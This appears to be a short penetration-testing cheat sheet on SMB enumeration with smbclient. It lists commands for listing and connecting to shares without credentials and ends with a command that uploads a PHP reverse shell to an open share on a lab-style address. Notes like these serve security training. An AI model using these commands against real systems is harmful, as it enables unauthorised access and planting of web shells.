SMB
Server Message Block - Ports 445/139
smbclient
Without Credentials
Without Credentials
List Resource list
smbclient -L <IP>
List Null session
smbclient -N <IP>
List User Share
smbclient //IP/<SHARE> -U <USER>
Connect to share
smbclient -N \\\\IP\Share
Without Credentials
smbclient --no-pass //IP/<Share>
Resources list + Null session
smbclient -L \\10.10.10.123 -N
Upload PHP reverse shell
smbclient -N //10.10.10.123/Development -c 'put cmd.php tokyo.php
Last updated